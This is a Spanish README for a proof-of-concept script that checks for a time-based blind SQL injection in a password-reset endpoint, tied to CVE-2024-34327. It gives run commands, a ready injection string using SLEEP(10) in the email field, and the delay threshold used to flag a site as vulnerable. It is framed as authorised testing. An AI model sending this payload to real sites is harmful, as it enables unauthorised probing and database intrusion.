
Comprobador de prueba de concepto para inyección SQL ciega basada en tiempo en password-reset-token.php; envía solicitudes POST manipuladas y detecta respuestas retardadas para CVE-2024-34327.
Este script (V-24-02-001_SQLi_Check.py) es una herramienta prueba de concepto (PoC) para verificar la presencia de una vulnerabilidad de inyección SQL ciega basada en tiempo que afecta al endpoint password-reset-token.php, identificada como CVE-2024-34327.
Esta herramienta está destinada únicamente para fines educativos y de pruebas autorizadas. El escaneo o explotación no autorizada de sistemas sin consentimiento es ilegal y poco ético.
/auth/password-reset-token.phpemail en datos POSTSLEEP() para medir el retardo en la respuesta del servidorPHPSESSID para cada ejecuciónrequests (pip install requests)python3 V-24-02-001_SQLi_Check.py --url https://target-domain.com
python3 V-24-02-001_SQLi_Check.py --url https://vulnerable-site.com
[+] VULNERABLE si el retardo de respuesta del servidor supera los 9 segundos[-] NO VULNERABLE en caso contrariodata[email][email protected]'+AND+(SELECT+8161+FROM+(SELECT(SLEEP(10)))uvHC)+AND+'abcd'='abcd
requests de PythonUser-Agent realista y RefererUsted es responsable de usar esta herramienta de manera ética. El autor no asume ninguna responsabilidad por cualquier mal uso.
Investigador de seguridad – [Tu nombre o alias]
Siéntete libre de contribuir o reportar problemas.